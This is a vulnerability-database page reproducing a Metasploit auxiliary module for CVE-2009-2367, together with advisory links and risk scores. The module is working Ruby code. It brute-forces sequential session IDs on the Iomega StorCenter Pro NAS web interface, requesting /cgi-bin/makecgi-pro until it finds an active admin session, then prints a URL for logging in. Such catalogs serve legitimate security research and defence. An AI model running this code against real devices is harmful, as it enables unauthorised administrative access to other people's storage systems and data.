Lucene search
K

Iomega StorCenter Pro NAS Web Authentication Bypass

🗓️ 01 Jul 2009 03:55:56Reported by aushack <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 58 Views

Iomega StorCenter Pro NAS Web Authentication Bypass. Session ID increment allows brute force attacks to gain admin acces

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-2367
29 May 201815:50
circl
CVE
CVE-2009-2367
8 Jul 200915:00
cve
Cvelist
CVE-2009-2367
8 Jul 200915:00
cvelist
NVD
CVE-2009-2367
8 Jul 200915:30
nvd
Packet Storm
Iomega StorCenter Pro NAS Web Authentication Bypass
31 Aug 202400:00
packetstorm
Prion
Design/Logic Flaw
8 Jul 200915:30
prion
Positive Technologies
PT-2009-4796 · Iomega · Iomega Storcenter Pro
8 Jul 200900:00
ptsecurity
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',
      'Description' => %q{
        The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,
        allowing for simple brute force attacks to bypass authentication and gain administrative
        access.
        },
      'References' => [
        [ 'OSVDB', '55586' ],
        [ 'CVE', '2009-2367' ],
      ],
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE
    )

    register_options(
      [
        OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
      ]
    )
  end

  def run
    datastore['SID_MAX'].times do |x|
      print_status("Trying session ID #{x}")

      res = send_request_raw({
        'uri' => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",
        'method' => 'GET'
      }, 25)

      if (res && res.to_s =~ (/Log out/))
        print_status("Found valid session ID number #{x}!")
        print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")
        break
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_error("Unable to connect to #{rhost}:#{rport}")
      break
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 14:30Current
7.5High risk
Vulners AI Score7.5
CVSS 27.5
CVSS 3.19.8
EPSS0.23195
58